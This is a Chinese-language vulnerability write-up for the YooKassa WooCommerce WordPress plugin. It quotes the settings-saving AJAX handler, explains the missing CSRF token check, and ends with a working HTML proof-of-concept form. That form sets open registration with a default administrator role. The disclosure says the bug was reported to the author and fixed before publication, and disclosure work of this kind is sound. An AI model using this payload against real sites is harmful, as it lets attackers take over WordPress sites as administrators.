ЮKassa для WooCommerce plugin 是一款支持RUSSIA支付yandex的一款商场插件,
在文件yookassa/admin/yookassaadmin.php
第58行add_action( ‘wp_ajax_yookassa_save_settings’, array( $this, ‘save_settings’ ) );
中save_settings函数被挂在wp_ajax_yookassa_save_settings上,
在第563-604行中的save_settings函数,我们看下
public function save_settings()
{
header(‘Content-Type: application/json’);
if (!is_ajax()) {
echo json_encode(array(‘status’ => ‘error’, ‘error’ => ‘Unknown’, ‘code’ => ‘unknown’));
wp_die();
}
if ($options = explode(‘,’, wp_unslash($_POST[‘page_options’]))) {
$user_language_old = get_user_locale();
// Save options
array_map(function ($option) {
$option = trim($option);
if (isset($_POST[$option])) {
if (is_array($_POST[$option])) {
$value = $_POST[$option];
array_walk_recursive($value, function (&$item) {
$item = sanitize_textarea_field(wp_unslash(trim($item)));
});
} else {
$value = sanitize_textarea_field(wp_unslash(trim($_POST[$option])));
}
} else {
$value = null;
}
update_option($option, $value);
}, $options);
unset($GLOBALS[‘locale’]);
$user_language_new = get_user_locale();
if ($user_language_old !== $user_language_new) {
load_default_textdomain($user_language_new);
}
} else {
echo json_encode(array(‘status’ => ‘error’, ‘error’ => ‘Unknown’, ‘code’ => ‘unknown’));
wp_die();
}
echo json_encode(array(‘status’ => ‘success’));
wp_die();
}
这里没有用check_ajax_refer()去判断当前的ajax是否是外部输入,从而导致CSRF的执行
漏洞利用如下:
< html>
< body>
< form action="http://exsample.com/wp-admin/admin-ajax.php?action=yandex_checkout_save_settings"
method="POST" enctype="multipart/form-data">
< input type="hidden" name="page_options" value="users_can_register,default_role">
< input type="hidden" name="users_can_register" value="1">
< input type="hidden" name="default_role" value="administrator">
< input type="submit" name="Submit">
< /form>
< /body>
< /html>
声明:此漏洞第一时间通知原作者并在漏洞修复后征得作者同意后公开